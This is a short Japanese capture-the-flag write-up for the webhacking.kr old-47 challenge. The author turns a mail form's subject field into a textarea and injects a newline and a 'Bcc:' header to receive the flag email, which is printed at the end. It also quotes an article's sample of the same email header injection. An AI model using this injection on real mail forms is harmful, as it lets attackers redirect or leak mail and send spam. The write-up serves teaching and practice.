https://webhacking.kr/challenge/bonus-11/

メールを送信する模様

メールを送る機能がある。

Mail subject :

---

Mail has been sent

---

メールヘッダーインジェクション

どうやらメールヘッダーインジェクションなる攻撃があるらしい。

https://qiita.com/tamura__246/items/bdc149d0c7ce23fcb7df#%E6%94%BB%E6%92%83%E3%81%97%E3%81%A6%E3%81%BF%E3%82%88%E3%81%86

件名の入力欄をtextareaに変更し、改行してから「Bcc: 」で始まる１行を追加したわけです。その後送信ボタンをクリックすると、FakeSMTPは次のようなメールを受信します。

Thu, 14 Jun 2018 22:45:57 +0900 (JST)
Date: Thu, 14 Jun 2018 22:45:57 +0900 (JST)
To: root@localhost
Message-ID: <645809008.5.1528983957933.JavaMail.tamura@tamura-virtual-machine>
Subject: test
Bcc: [email protected]
MIME-Version: 1.0
Content-Type: multipart/mixed; 
    boundary="----=_Part_4_350452366.1528983957931"

------=_Part_4_350452366.1528983957931
Content-Type: text/html;charset=UTF-8
Content-Transfer-Encoding: quoted-printable

=E5=90=8D=E5=89=8D: Kohei<br>=E3=83=A1=E3=83=BC=E3=83=AB=E3=82=A2=E3=83=89=
=E3=83=AC=E3=82=B9: [email protected]<br><br>=E6=9C=AC=E6=96=87: test!!<br>
------=_Part_4_350452366.1528983957931--

textareaに変更し、メールヘッダーインジェクションを試みる

<form method="post" name="mailfrm">
Mail subject : <textarea type="text" name="subject" size="50" value="Flag of webhacking.kr old-47 chall" maxlength="50" style="width: 289px; height: 89px;"></textarea><input type="submit" value="send">
</form>

test
Bcc: [email protected]

Flagは

FLAG{wasted_too_much_time_damn}